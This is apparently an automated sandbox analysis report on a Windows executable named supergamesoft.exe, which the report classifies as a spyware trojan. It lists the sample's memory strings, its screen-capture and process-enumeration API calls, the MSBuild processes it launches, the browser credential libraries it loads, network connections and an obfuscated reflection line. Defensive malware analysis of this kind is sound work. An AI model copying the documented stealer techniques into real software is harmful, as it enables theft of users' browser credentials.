                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://steamcommunity.com/workshop/
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/
                        Source: 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/about/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/explore/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/legal/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/mobile
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/news/
                        Source: MSBuild.exe, 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2346186542.00000000016F1000.00000004.00000020.00020000.00000000.sdmp, 76561199747278259[1].htm.4.drString found in binary or memory: https://store.steampowered.com/points/shop/
                        Source: unknown; HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknown; HTTPS traffic detected: 5.75.212.60:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4_2_00411530 GetDesktopWindow, GetWindowRect, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, GlobalFix, GlobalSize, SelectObject, DeleteObject, DeleteObject, ReleaseDC, CloseWindow
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4_2_6C58ED10 malloc, NtFlushVirtualMemory, memset, memset, memset, memset, memset, memcpy, free, memset, memset, memcpy, memset, memset, memset, memset, memset
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4_2_6C5CB700 NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4_2_6C5CB8C0 rand_s, NtQueryVirtualMemory
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4_2_6C5CB910 rand_s, NtQueryVirtualMemory, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error, GetLastError
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Code function: 4_2_6C56F280 NtQueryVirtualMemory, GetProcAddress, NtQueryVirtualMemory, RtlNtStatusToDosError, RtlSetLastWin32Error
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6AE6E04_2_6C6AE6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6346D04_2_6C6346D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C6907004_2_6C690700
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C63A7D04_2_6C63A7D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C79D930 appears 33 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C5A94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C79DAE0 appears 41 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C639B10 appears 35 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C59CBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00402000 appears 287 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C633620 appears 40 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6C7909D0 appears 172 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812
                        Source: file.exe, 00000000.00000002.1689890749.0000000000AEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePE.dll& vs file.exe
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSWxnr.dll0 vs file.exe
                        Source: file.exe, 00000000.00000000.1683221894.000000000065C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupergamesoft.exe$ vs file.exe
                        Source: file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSWxnr.dll0 vs file.exe
                        Source: file.exe, 00000000.00000002.1691045839.0000000002A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.1691045839.0000000002A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
                        Source: file.exe, 00000000.00000002.1691045839.0000000002A64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs file.exe
                        Source: file.exe, 00000000.00000002.1706153820.0000000005533000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSWxnr.dll0 vs file.exe
                        Source: file.exeBinary or memory string: OriginalFilenamesupergamesoft.exe$ vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.file.exe.42540c0.2.raw.unpack, viSFIRaCy.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSB4098: MSBuild is invoking VCBuild to build this project. Project-to-project references between VC++ projects (.VCPROJ) and C#/VB/VJ# projects (.CSPROJ, .VBPROJ, .VJSPROJ) are not supported by the command-line build systems when building stand-alone VC++ projects. Projects that contain such project-to-project references will fail to build. Please build the solution file containing this project instead.
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: MSB4126: The specified solution configuration "{0}" is invalid. Please specify a valid solution configuration using the Configuration and Platform properties (e.g. MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU") or leave those properties blank to use the default solution configuration.
                        Source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: yMSB4051: Project {0} is referencing a project with GUID {1}, but a project with this GUID was not found in the .SLN file.
                        Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/24@2/2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_6C5C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00410900 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear
                        Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                        Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
                        Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6512
                        Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\153a8cdf-ac09-4931-85d0-e1eecfa040c1
                        Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                        Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: file.exe ReversingLabs: Detection: 32%
                        Source: file.exe Virustotal: Detection: 24%
                        Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6512 -s 2812
                        Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\file.exe Section loaded: mscorjit.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: file.exe Static file information: File size 6581760 > 1048576
                        Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x637c00
                        Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000004.00000002.2360020624.000000002088F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: supergamesoft.pdb( source: file.exe
                        Source: Binary string: PE.pdbH] source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: supergamesoft.pdb source: file.exe
                        Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\SWxnr.pdb source: file.exe, 00000000.00000002.1692402449.0000000003F76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1692402449.000000000446A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1706153820.0000000005533000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000004.00000002.2372726063.0000000038643000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                        Source: Binary string: PE.pdb source: file.exe, 00000000.00000002.1705915663.0000000005400000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000004.00000002.2366512276.000000002C765000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.4.dr
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000004.00000002.2375510661.000000003E5B5000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.4.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000004.00000002.2363277109.00000000267F9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.4.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000004.00000002.2352339201.000000001A488000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2359423972.00000000203F8000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000004.00000002.2369809932.00000000326D3000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.4.dr

                        Data Obfuscation

                        Source: 0.2.file.exe.5400000.14.raw.unpack, fDX9tehJ5EFemhKZwc.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
